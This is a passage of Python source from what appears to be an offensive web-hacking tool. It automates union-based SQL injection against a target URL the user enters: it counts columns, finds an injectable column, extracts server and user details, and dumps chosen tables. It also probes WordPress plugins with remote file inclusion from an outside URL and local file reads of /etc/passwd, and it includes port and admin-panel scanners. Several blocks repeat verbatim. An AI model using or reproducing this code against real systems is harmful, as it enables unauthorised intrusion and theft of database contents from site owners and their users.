sqli_session_user_soup = BeautifulSoup(auto_sql_injection_request_session_user.text, 'html.parser')
sqli_symlink_soup = BeautifulSoup(auto_sql_injection_request_symlink.text, 'html.parser')
sqli_ssl_soup = BeautifulSoup(auto_sql_injection_request_ssl.text, 'html.parser')
sqli_hostname = sqli_hostname_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_tmpdir = sqli_tmpdir_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_datadir = sqli_datadir_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_version = sqli_version_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_basedir = sqli_basedir_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_user = sqli_user_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_database = sqli_database_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_schema = sqli_schema_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_uuid = sqli_uuid_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_system_user = sqli_system_user_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_session_user = sqli_session_user_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_symlink = sqli_symlink_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_ssl = sqli_ssl_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
print ('[+] Hostname: {0}'.format(sqli_hostname))
print ('[+] TMP Directory: {0}'.format(sqli_tmpdir))
print ('[+] Data Directory: {0}'.format(sqli_datadir))
print ('[+] Database Version: {0}'.format(sqli_version))
print ('[+] Base Directory: {0}'.format(sqli_basedir))
print ('[+] Current User: {0}'.format(sqli_user))
print ('[+] Current Database: {0}'.format(sqli_database))
print ('[+] Current Schema: {0}'.format(sqli_schema))
print ('[+] System UUID Key: {0}'.format(sqli_uuid))
print ('[+] Current System User: {0}'.format(sqli_system_user))
print ('[+] Session User: {0}'.format(sqli_session_user))
print ('[+] Is Sysmlink Enabled?: {0}'.format(sqli_symlink))
print ('[+] Is SSL Enabled?: {0}'.format(sqli_ssl))
print ('')
print ('[~] Dumping Database:')
auto_sql_injection_request_dios_soup_pureblood = auto_sql_injection_request_dios_soup.findAll('strong', attrs={'id': 'PureBlood'})
auto_sql_injection_request_dios_soup_pureblood_list = []
for i in auto_sql_injection_request_dios_soup_pureblood:
if i.text in auto_sql_injection_request_dios_soup_pureblood_list:
pass
else:
auto_sql_injection_request_dios_soup_pureblood_list.append(i.text)
for i in auto_sql_injection_request_dios_soup_pureblood_list:
print ('\t{0}'.format(i))
print ('')
sqli_table = ''
user_choice = ''
sqli_column = []
print ('{2}[{1}#{2}] {3}- {4}Just enter exit/done if you want to start dumping{0}'.format(reset + bold, green, blue, yellow, cyan))
while True:
if sys.version_info[0] == 3:
if sqli_table:
pass
elif not sqli_table:
user_choice1 = str(input('Table> '))
sqli_table = user_choice1
user_choice = str(input('\tColumn> '))
if user_choice == 'done' or user_choice == 'exit' or user_choice == '':
break
else:
sqli_column.append(user_choice)
if sys.version_info[0] == 2:
if sqli_table:
pass
elif not sqli_table:
user_choice1 = str(raw_input('Table> '))
sqli_table = user_choice1
user_choice = str(raw_input('\tColumn> '))
if user_choice == 'done' or user_choice == 'exit' or user_choice == '':
break
else:
sqli_column.append(user_choice)
print ('')
print ('[~] Dumping Columns:')
for i in sqli_column:
auto_sql_injection_request_column_dump_list = []
auto_sql_injection_request_column_dump_url = '{0}{1} /*!50000Union*/ all select {2} from {3}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii, sqli_table)
auto_sql_injection_request_column_dump_url = auto_sql_injection_request_column_dump_url.replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_dump_column_payload + ',')
auto_sql_injection_request_column_dump_url = auto_sql_injection_request_column_dump_url.replace('<column>', i)
auto_sql_injection_request_column_dump = requests.get(auto_sql_injection_request_column_dump_url)
auto_sql_injection_request_column_dump_soup = BeautifulSoup(auto_sql_injection_request_column_dump.text, 'html.parser')
auto_sql_injection_request_column_dump_soup_pureblood = auto_sql_injection_request_column_dump_soup.find_all('strong', attrs={'id': 'PureBloodINFO'})
for ii in auto_sql_injection_request_column_dump_soup_pureblood:
if ii.text in auto_sql_injection_request_column_dump_list:
pass
elif ii.text not in auto_sql_injection_request_column_dump_list:
auto_sql_injection_request_column_dump_list.append(ii.text)
for iii in auto_sql_injection_request_column_dump_list:
print ('\t{0} -> {1}'.format(i, iii))
elif auto_sql_injection_request_result == 'Vulnerable2': # error_output() == False
auto_sql_injection_request_ii = 0
auto_sql_injection_request_iii = ''
print ('[~] - Counting How Many Columns:')
auto_sql_injection_request_orderby = requests.get('{0}\' order by {1}--+'.format(url, '1'))
auto_sql_injection_request_orderby_html = BeautifulSoup(auto_sql_injection_request_orderby.text, 'html.parser')
if 'mysql_fetch_row():' in auto_sql_injection_request_orderby.text:
auto_sql_injection_orderby_result = 'err1'
print ('YES')
else:
auto_sql_injection_orderby_result = ''
if auto_sql_injection_orderby_result == 'err1':
single_quote_payload = ''
else:
single_quote_payload = '\''
for i in range(50):
if i == 0:
i = i + 1
print ('\tColumn -> {0}'.format(str(i)))
auto_sql_injection_request_orderby = requests.get('{0}{1} order by {2}--+'.format(url, single_quote_payload, str(i)))
auto_sql_injection_request_orderby_html = BeautifulSoup(auto_sql_injection_request_orderby.text, 'html.parser')
auto_sql_injection_request_orderby_html_h1 = auto_sql_injection_request_orderby_html.find_all('h1')
auto_sql_injection_request_orderby_html_h2 = auto_sql_injection_request_orderby_html.find_all('h2')
auto_sql_injection_request_orderby_html_h3 = auto_sql_injection_request_orderby_html.find_all('h3')
auto_sql_injection_request_orderby_html_p = auto_sql_injection_request_orderby_html.find_all('p')
if auto_sql_injection_request_orderby.status_code == 403 or auto_sql_injection_request_orderby.status_code == 406:
break
if auto_sql_injection_request_origin_html_h1 != auto_sql_injection_request_orderby_html_h1:
auto_sql_injection_request_i = i
break
elif auto_sql_injection_request_origin_html_h2 != auto_sql_injection_request_orderby_html_h2:
auto_sql_injection_request_i = i
break
elif auto_sql_injection_request_origin_html_h3 != auto_sql_injection_request_orderby_html_h3:
auto_sql_injection_request_i = i
break
elif auto_sql_injection_request_origin_html_p != auto_sql_injection_request_orderby_html_p:
auto_sql_injection_request_i = i
break
if not auto_sql_injection_request_i:
for i in range(50):
print ('\tColumn -> {0}'.format(str(i)))
auto_sql_injection_request_orderby = requests.get('{0}{1} group by {2}--+'.format(url, single_quote_payload, str(i)))
auto_sql_injection_request_orderby_html = BeautifulSoup(auto_sql_injection_request_orderby.text, 'html.parser')
auto_sql_injection_request_orderby_html_h1 = auto_sql_injection_request_orderby_html.find_all('h1')
auto_sql_injection_request_orderby_html_h2 = auto_sql_injection_request_orderby_html.find_all('h2')
auto_sql_injection_request_orderby_html_h3 = auto_sql_injection_request_orderby_html.find_all('h3')
auto_sql_injection_request_orderby_html_p = auto_sql_injection_request_orderby_html.find_all('p')
if auto_sql_injection_request_orderby.status_code == 403 or auto_sql_injection_request_orderby.status_code == 406:
print ('[!] - Not Vulnerable!')
print ('')
web_application_attack()
if auto_sql_injection_request_origin_html_h1 != auto_sql_injection_request_orderby_html_h1:
auto_sql_injection_request_i = i
break
elif auto_sql_injection_request_origin_html_h2 != auto_sql_injection_request_orderby_html_h2:
auto_sql_injection_request_i = i
break
elif auto_sql_injection_request_origin_html_h3 != auto_sql_injection_request_orderby_html_h3:
auto_sql_injection_request_i = i
break
elif auto_sql_injection_request_origin_html_p != auto_sql_injection_request_orderby_html_p:
auto_sql_injection_request_i = i
break
if not auto_sql_injection_request_i:
print ('[!] - Not Able to Find How Many Columns!')
print ('')
web_application_attack()
print ('[+] - Columns: {0}'.format(str(auto_sql_injection_request_i - 1)))
for i in range(auto_sql_injection_request_i):
auto_sql_injection_request_ii = auto_sql_injection_request_ii + 1
if auto_sql_injection_request_ii == auto_sql_injection_request_i:
auto_sql_injection_request_ii = auto_sql_injection_request_ii - 1
auto_sql_injection_request_iii += '{0},'.format(str(auto_sql_injection_request_ii))
break
auto_sql_injection_request_iii += '{0},'.format(str(auto_sql_injection_request_ii))
auto_sql_injection_request_iii = auto_sql_injection_request_iii.replace(str(auto_sql_injection_request_ii) + ',' + str(auto_sql_injection_request_ii) + ',', str(auto_sql_injection_request_ii))
print ('')
print ('{2}[{1}#{2}] {3}- {4}Please put "-" after "=". Example: =-1337{0}'.format(reset + bold, green, blue, yellow, cyan))
if sys.version_info[0] == 3:
target = str(input('Target> '))
if sys.version_info[0] == 2:
target = str(raw_input('Target> '))
print ('')
if 'http://' in target:
url = target
hostname = target.replace('http://', '')
elif 'https://' in target:
url = target
hostname = target.replace('https://', '')
if '://' not in target:
url = 'http://' + target
hostname = target
print ('[~] - Finding Vulnerable Column:')
auto_sql_injection_request_vulncolumn = requests.get('{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii))
auto_sql_injection_request_vulncolumn_soup = BeautifulSoup(auto_sql_injection_request_vulncolumn.content, 'html.parser')
auto_sql_injection_request_vulncolumn_nums = re.findall('\d+', str(auto_sql_injection_request_vulncolumn_soup))
auto_sql_injection_request_vulncolumn_possible_vulncolumn = []
auto_sql_injection_request_vulncolumn_column = ''
for i in auto_sql_injection_request_vulncolumn_nums:
if len(i) < 2:
auto_sql_injection_request_vulncolumn_possible_vulncolumn.append(i)
if i == 0:
pass
auto_sql_injection_request_vulncolumn_possible_vulncolumn = list(set(auto_sql_injection_request_vulncolumn_possible_vulncolumn))
auto_sql_injection_request_vulncolumn_column = ''
for i in auto_sql_injection_request_vulncolumn_possible_vulncolumn:
print ('\tTrying -> {0}'.format(str(i)))
auto_sql_injection_request_dios_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + i + ',', ',' + dios1 + ',')
auto_sql_injection_request_dios = requests.get(auto_sql_injection_request_dios_url)
if 'Table:' in auto_sql_injection_request_dios.text and 'id="PureBlood"' in auto_sql_injection_request_dios.text:
auto_sql_injection_request_dios_soup = BeautifulSoup(auto_sql_injection_request_dios.content, 'html.parser')
auto_sql_injection_request_dios_url = auto_sql_injection_request_dios_url
auto_sql_injection_request_vulncolumn_column = i
break
if not auto_sql_injection_request_vulncolumn_column:
print ('[!] - Not Vulnerable!')
print ('')
web_application_attack()
print ('[+] - Vulnerable Column: {0}'.format(str(auto_sql_injection_request_vulncolumn_column)))
auto_sql_injection_request_hostname_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_hostname + ',')
auto_sql_injection_request_tmpdir_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_tmpdir + ',')
auto_sql_injection_request_datadir_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_datadir + ',')
auto_sql_injection_request_version_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_version + ',')
auto_sql_injection_request_basedir_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_basedir + ',')
auto_sql_injection_request_user_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_user + ',')
auto_sql_injection_request_database_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_database + ',')
auto_sql_injection_request_schema_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_schema + ',')
auto_sql_injection_request_uuid_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_uuid + ',')
auto_sql_injection_request_system_user_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_system_user + ',')
auto_sql_injection_request_session_user_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_session_user + ',')
auto_sql_injection_request_symlink_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_symlink + ',')
auto_sql_injection_request_ssl_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_ssl + ',')
auto_sql_injection_request_hostname = requests.get(auto_sql_injection_request_hostname_url)
auto_sql_injection_request_tmpdir = requests.get(auto_sql_injection_request_tmpdir_url)
auto_sql_injection_request_datadir = requests.get(auto_sql_injection_request_datadir_url)
auto_sql_injection_request_version = requests.get(auto_sql_injection_request_version_url)
auto_sql_injection_request_basedir = requests.get(auto_sql_injection_request_basedir_url)
auto_sql_injection_request_user = requests.get(auto_sql_injection_request_user_url)
auto_sql_injection_request_database = requests.get(auto_sql_injection_request_database_url)
auto_sql_injection_request_schema = requests.get(auto_sql_injection_request_schema_url)
auto_sql_injection_request_uuid = requests.get(auto_sql_injection_request_uuid_url)
auto_sql_injection_request_system_user = requests.get(auto_sql_injection_request_system_user_url)
auto_sql_injection_request_session_user = requests.get(auto_sql_injection_request_session_user_url)
auto_sql_injection_request_symlink = requests.get(auto_sql_injection_request_symlink_url)
auto_sql_injection_request_ssl = requests.get(auto_sql_injection_request_ssl_url)
sqli_hostname_soup = BeautifulSoup(auto_sql_injection_request_hostname.text, 'html.parser')
sqli_tmpdir_soup = BeautifulSoup(auto_sql_injection_request_tmpdir.text, 'html.parser')
sqli_datadir_soup = BeautifulSoup(auto_sql_injection_request_datadir.text, 'html.parser')
sqli_version_soup = BeautifulSoup(auto_sql_injection_request_version.text, 'html.parser')
sqli_basedir_soup = BeautifulSoup(auto_sql_injection_request_basedir.text, 'html.parser')
sqli_user_soup = BeautifulSoup(auto_sql_injection_request_user.text, 'html.parser')
sqli_database_soup = BeautifulSoup(auto_sql_injection_request_database.text, 'html.parser')
sqli_schema_soup = BeautifulSoup(auto_sql_injection_request_schema.text, 'html.parser')
sqli_uuid_soup = BeautifulSoup(auto_sql_injection_request_uuid.text, 'html.parser')
sqli_system_user_soup = BeautifulSoup(auto_sql_injection_request_system_user.text, 'html.parser')
sqli_session_user_soup = BeautifulSoup(auto_sql_injection_request_session_user.text, 'html.parser')
sqli_symlink_soup = BeautifulSoup(auto_sql_injection_request_symlink.text, 'html.parser')
sqli_ssl_soup = BeautifulSoup(auto_sql_injection_request_ssl.text, 'html.parser')
sqli_hostname = sqli_hostname_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_tmpdir = sqli_tmpdir_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_datadir = sqli_datadir_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_version = sqli_version_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_basedir = sqli_basedir_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_user = sqli_user_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_database = sqli_database_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_schema = sqli_schema_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_uuid = sqli_uuid_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_system_user = sqli_system_user_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_session_user = sqli_session_user_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_symlink = sqli_symlink_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_ssl = sqli_ssl_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
print ('[+] Hostname: {0}'.format(sqli_hostname))
print ('[+] TMP Directory: {0}'.format(sqli_tmpdir))
print ('[+] Data Directory: {0}'.format(sqli_datadir))
print ('[+] Database Version: {0}'.format(sqli_version))
print ('[+] Base Directory: {0}'.format(sqli_basedir))
print ('[+] Current User: {0}'.format(sqli_user))
print ('[+] Current Database: {0}'.format(sqli_database))
print ('[+] Current Schema: {0}'.format(sqli_schema))
print ('[+] System UUID Key: {0}'.format(sqli_uuid))
print ('[+] Current System User: {0}'.format(sqli_system_user))
print ('[+] Session User: {0}'.format(sqli_session_user))
print ('[+] Is Sysmlink Enabled?: {0}'.format(sqli_symlink))
print ('[+] Is SSL Enabled?: {0}'.format(sqli_ssl))
print ('')
print ('[~] Dumping Database:')
auto_sql_injection_request_dios_soup_pureblood_list = []
auto_sql_injection_request_dios_soup_pureblood = auto_sql_injection_request_dios_soup.findAll('strong', attrs={'id': 'PureBlood'})
for i in auto_sql_injection_request_dios_soup_pureblood:
if i.text in auto_sql_injection_request_dios_soup_pureblood_list:
pass
else:
auto_sql_injection_request_dios_soup_pureblood_list.append(i.text)
for i in auto_sql_injection_request_dios_soup_pureblood_list:
print ('\t{0}'.format(i))
print ('')
sqli_table = ''
user_choice = ''
sqli_column = []
print ('{2}[{1}#{2}] {3}- {4}Just enter exit/done if you want to start dumping{0}'.format(reset + bold, green, blue, yellow, cyan))
while True:
if sys.version_info[0] == 3:
if sqli_table:
pass
elif not sqli_table:
user_choice1 = str(input('Table> '))
sqli_table = user_choice1
user_choice = str(input('\tColumn> '))
if user_choice == 'done' or user_choice == 'exit' or user_choice == '':
break
else:
sqli_column.append(user_choice)
if sys.version_info[0] == 2:
if sqli_table:
pass
elif not sqli_table:
user_choice1 = str(raw_input('Table> '))
sqli_table = user_choice1
user_choice = str(raw_input('\tColumn> '))
if user_choice == 'done' or user_choice == 'exit' or user_choice == '':
break
else:
sqli_column.append(user_choice)
print ('')
print ('[~] Dumping Columns:')
for i in sqli_column:
auto_sql_injection_request_column_dump_list = []
auto_sql_injection_request_column_dump_url = '{0}{1} /*!50000Union*/ all select {2} from {3}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii, sqli_table)
auto_sql_injection_request_column_dump_url = auto_sql_injection_request_column_dump_url.replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_dump_column_payload + ',')
auto_sql_injection_request_column_dump_url = auto_sql_injection_request_column_dump_url.replace('<column>', i)
auto_sql_injection_request_column_dump = requests.get(auto_sql_injection_request_column_dump_url)
auto_sql_injection_request_column_dump_soup = BeautifulSoup(auto_sql_injection_request_column_dump.text, 'html.parser')
auto_sql_injection_request_column_dump_soup_pureblood = auto_sql_injection_request_column_dump_soup.find_all('strong', attrs={'id': 'PureBloodINFO'})
for ii in auto_sql_injection_request_column_dump_soup_pureblood:
if ii.text in auto_sql_injection_request_column_dump_list:
pass
elif ii.text not in auto_sql_injection_request_column_dump_list:
auto_sql_injection_request_column_dump_list.append(ii.text)
for iii in auto_sql_injection_request_column_dump_list:
print ('\t{0} -> {1}'.format(i, iii))
def auto_xss_injection(self, xi_url):
print ('')
def wordpress_vulnerability_check(self, wvc_url):
print ('[#] - Checking (WordPress Woocommerce - Directory Craversal):')
wp_woocommerce_wvc_url = ''
wp_woocommerce = requests.get(wvc_url + '/wp-content/plugins/woocommerce/templates/emails/plain')
wp_woocommerce_wvc_url = wvc_url + '/wp-content/plugins/woocommerce/templates/emails/plain'
if wp_woocommerce.status_code == 200:
print ('\t[+] - Vulnerable! ~ ' + wp_woocommerce_wvc_url)
elif wp_woocommerce.status_code == 301:
print ('\t[!] - Redirected! ~ ' + wp_woocommerce_wvc_url)
elif wp_woocommerce.status_code == 403:
print ('\t[!] - Forbidden! ~ ' + wp_woocommerce_wvc_url)
else:
print ('\t[!] - 404 Found! ~ ' + wp_woocommerce_wvc_url)
print ('\n\n[#] - Checking (Wordpress Plugin Booking Calendar 3.0.0 - SQL Injection / Cross-Site Scripting):')
wp_plugin_booking_calendar_wvc_url = ''
wp_plugin_booking_calendar = requests.get(wvc_url + '/BOOKING_WP/wp-content/plugins/wp-booking-calendar/public/ajax/getMonthCalendar.php')
if wp_plugin_booking_calendar.status_code == 200:
wp_plugin_booking_calendar = wp_plugin_booking_calendar
wp_plugin_booking_calendar_wvc_url = wvc_url + '/BOOKING_WP/wp-content/plugins/wp-booking-calendar/public/ajax/getMonthCalendar.php'
elif wp_plugin_booking_calendar.status_code == 404:
wp_plugin_booking_calendar = requests.get(wvc_url + '/wp-content/plugins/wp-booking-calendar/public/ajax/getMonthCalendar.php')
if wp_plugin_booking_calendar.status_code == 200:
wp_plugin_booking_calendar = wp_plugin_booking_calendar
wp_plugin_booking_calendar_wvc_url = wvc_url + '/wp-content/plugins/wp-booking-calendar/public/ajax/getMonthCalendar.php'
else:
wp_plugin_booking_calendar_wvc_url = wvc_url + '/wp-content/plugins/wp-booking-calendar/public/ajax/getMonthCalendar.php'
wp_plugin_booking_calendar = 'Not Found'
if wp_plugin_booking_calendar == 'Not Found':
wp_plugin_booking_calendar_wvc_url = wvc_url + '/wp-content/plugins/wp-booking-calendar/public/ajax/getMonthCalendar.php'
print ('\t[!] - 404 Found! ~ ' + wp_plugin_booking_calendar_wvc_url)
else:
print ('\t[+] - XSS Maybe Vulnerable! ~ ' + wp_plugin_booking_calendar_wvc_url + '?month=<XSS Payload>')
print ('\t[+] - SQLMap Maybe Vulnerable! ~ ' + wp_plugin_booking_calendar_wvc_url + '?month=')
print ('\t[+] - Unfortunately I can\'t handle alerts without using Selenium and you should manually use SQLMap. Try to do it manually')
print ('\n\n[#] - Checking (WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion):')
wp_plugin_wp_spritz_wvc_url = ''
wp_plugin_wp_spritz = requests.get(wvc_url + '/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php')
if wp_plugin_wp_spritz.status_code == 200:
wp_plugin_wp_spritz = requests.get(wvc_url + '/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?wvc_url=https://raw.githubusercontent.com/cr4shcod3/pureblood/master/l33t/rfi.txt')
wp_plugin_wp_spritz_wvc_url = wvc_url + '/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?wvc_url=https://raw.githubusercontent.com/cr4shcod3/pureblood/master/l33t/rfi.txt'
if 'PureBlood RFI ~Cr4sHCoD3' in wp_plugin_wp_spritz.text:
print ('\t[+] - Vulnerable! ~ ' + wp_plugin_wp_spritz_wvc_url)
wp_plugin_wp_spritz = requests.get(wvc_url + '/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?wvc_url=/etc/passwd')
if wp_plugin_wp_spritz.status_code == 403 or wp_plugin_wp_spritz.status_code == 400:
print ('\t[+] - Try to bypass LFI! ~ ' + wp_woocommerce_wvc_url)
elif 'The page you are trying to access is restricted due to a security rule.' in wp_plugin_wp_spritz.text:
print ('\t[+] - Try to bypass LFI! ~ ' + wp_woocommerce_wvc_url)
elif wp_plugin_wp_spritz.status_code == 404:
wp_plugin_wp_spritz_wvc_url = wvc_url + '/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php'
print ('\t[!] - 404 Found! ~ ' + wp_plugin_wp_spritz_wvc_url)
print ('\n\n[#] - Checking (WordPress Plugin Events Calendar - \'event_id\' SQL Injection):')
wp_plugin_events_calendar_wvc_url = ''
wp_plugin_events_calendar = requests.get(wvc_url + '/event.php?event_id=1')
if wp_plugin_events_calendar.status_code == 200:
wp_plugin_events_calendar_result = ''
wp_plugin_events_calendar = requests.get(wvc_url + '/event.php?event_id=1\'')
wp_plugin_events_calendar_wvc_url = wvc_url + '/event.php?event_id=1\''
for db, errors in dbms_errors.items():
for error in errors:
if re.compile(error).search(wp_plugin_events_calendar.text):
wp_plugin_events_calendar_result = 'Vulnerable'
print ('\t[+] - ' + db + ' Vulnerable! ~ ' + wp_plugin_events_calendar_wvc_url)
if wp_plugin_events_calendar_result == '':
print ('\t[!] - Not Vulnerable! ~ ' + wp_plugin_events_calendar_wvc_url)
elif wp_plugin_events_calendar.status_code == 404:
wp_plugin_events_calendar = requests.get(wvc_url + '/view-event.php?event_id=1')
wp_plugin_events_calendar_wvc_url = wvc_url + '/view-event.php?event_id=1'
if wp_plugin_events_calendar.status_code == 200:
wp_plugin_events_calendar_result = ''
wp_plugin_events_calendar = requests.get(wvc_url + '/view-event.php?event_id=1\'')
wp_plugin_events_calendar_wvc_url = wvc_url + '/view-event.php?event_id=1\''
for db, errors in dbms_errors.items():
for error in errors:
if re.compile(error).search(wp_plugin_events_calendar.text):
wp_plugin_events_calendar_result = 'Vulnerable'
print ('\t[+] - ' + db + ' Vulnerable! ~ ' + wp_plugin_events_calendar_wvc_url)
if wp_plugin_events_calendar_result == '':
print ('\t[!] - Not Vulnerable! ~ ' + wp_plugin_events_calendar_wvc_url)
elif wp_plugin_events_calendar.status_code == 404:
print ('\t[!] - 404 Found! ~ ' + wp_plugin_events_calendar_wvc_url)
class WebPentest:
def banner_grab(self, bg_url):
try:
banner_grab_request = requests.get(bg_url)
banner_grab_result = banner_grab_request.headers
banner_grab_result = str(banner_grab_result).replace("{'", "").replace("'}", "").replace("': '", ": ").replace("', '", ",\n")
self.banner_grab_result = banner_grab_result
return self.banner_grab_result
except:
print("Could not grab a banner info")
def whois(self, w_url):
try:
whois_query = whois.whois(w_url)
self.whois_result = whois_query
return self.whois_result
except:
print("Could not find perform whois")
def traceroute(self, t_hostname):
try:
traceroute_request = requests.get('https://api.hackertarget.com/mtr/?q=' + t_hostname)
traceroute_response = traceroute_request.text
traceroute_final = """{0}""".format(str(traceroute_response))
self.traceroute_result = traceroute_final
return self.traceroute_result
except:
print("Could not perform traceroute")
def dns_record(self, dr_hostname):
try:
dns_record_list = []
for i in ids:
t = threading.Thread(target=dns_record_scanner, args=(dr_hostname, i, dns_record_list, ))
t.start()
t.join()
self.dns_record_result = dns_record_list
return self.dns_record_result
except:
print("Could not find DNS record")
def reverse_dns_lookup(self, rdl_ip):
try:
rdl_ip = rdl_ip + '/24'
reverse_dns_lookup_request = requests.get('https://api.hackertarget.com/reversedns/?q=' + rdl_ip)
reverse_dns_lookup_response = reverse_dns_lookup_request.text
reverse_dns_lookup_final = """{0}""".format(str(reverse_dns_lookup_response))
self.reverse_ip_lookup_result = reverse_dns_lookup_final
return self.reverse_ip_lookup_result
except:
print("Could not perform dns reverse lookup")
def zone_transfer_lookup(self, ztl_hostname):
try:
zone_transfer_lookup_request = requests.get('https://api.hackertarget.com/zonetransfer/?q=' + ztl_hostname)
zone_transfer_lookup_response = zone_transfer_lookup_request.text
zone_transfer_lookup_final = """{0}""".format(str(zone_transfer_lookup_response))
self.zone_transfer_lookup_result = zone_transfer_lookup_final
return self.zone_transfer_lookup_result
except:
print("Could not perform zone transfer lookup")
def port_scan(self, ps_hostname, ps_pend): #https://stackoverflow.com/a/38210023
port_scan_list = []
threads = []
output = {}
delay = 10
for i in range(ps_pend + 1):
t = threading.Thread(target=TCP_connect, args=(ps_hostname, i, delay, output))
threads.append(t)
for i in range(ps_pend + 1):
threads[i].start()
for i in range(ps_pend + 1):
threads[i].join()
for i in range(ps_pend + 1):
if output[i] == 'Open':
port_scan_list.append('[+] Port Open - ' + str(i))
self.port_scan_result = port_scan_list
return self.port_scan_result
def admin_panel_scan(self, ads_url):
admin_panel_valid = []
admin_panel_redirect = []
ads_urls = []
r_path = []
ads_r_urls = []
robots = ['/robot.txt', '/robots.txt']
for i in admin_panel_list:
ads_urls.append(ads_url + i)
for i in robots:
r_robots = requests.get(ads_url + i)
if r_robots.status_code == 200:
r_robots = r_robots
else:
r_robots = ''
if r_robots == '':
pass
else:
robots = str(r_robots.text)
for i in robots.split("\n"):
if i.startswith('Allow'):
r_path.append(i.split(': ')[1].split(' ')[0])
elif i.startswith('Disallow'):
r_path.append(i.split(': ')[1].split(' ')[0])
for i in r_path:
ads_r_urls.append(ads_url + i)
for i in ads_r_urls:
ads_r_urls_request = requests.get(i)
if 'Admin' in ads_r_urls_request.text or 'Login' in ads_r_urls_request.text:
r_admin_panel = i
admin_panel_valid.append(i)
elif 'admin' in ads_r_urls_request.text or 'login' in ads_r_urls_request.text:
r_admin_panel = i
admin_panel_valid.append(i)
elif 'Username' in ads_r_urls_request.text or 'Password' in ads_r_urls_request.text:
r_admin_panel = i
admin_panel_valid.append(i)
elif 'username' in ads_r_urls_request.text or 'password' in ads_r_urls_request.text:
r_admin_panel = i
admin_panel_valid.append(i)
else:
r_admin_panel = None
if not admin_panel_valid:
for i in ads_urls:
admin_scan_request = requests.get(i)
if admin_scan_request.status_code == 200:
admin_panel_valid.append(i)
break
elif admin_scan_request.status_code == 301 or admin_scan_request.status_code == 302:
admin_panel_redirect.append(i)
else:
pass
admin_panel_valid = list(set(admin_panel_valid))
for i in admin_panel_redirect:
admin_panel_valid.append(i + ' - 301')
if not admin_panel_valid:
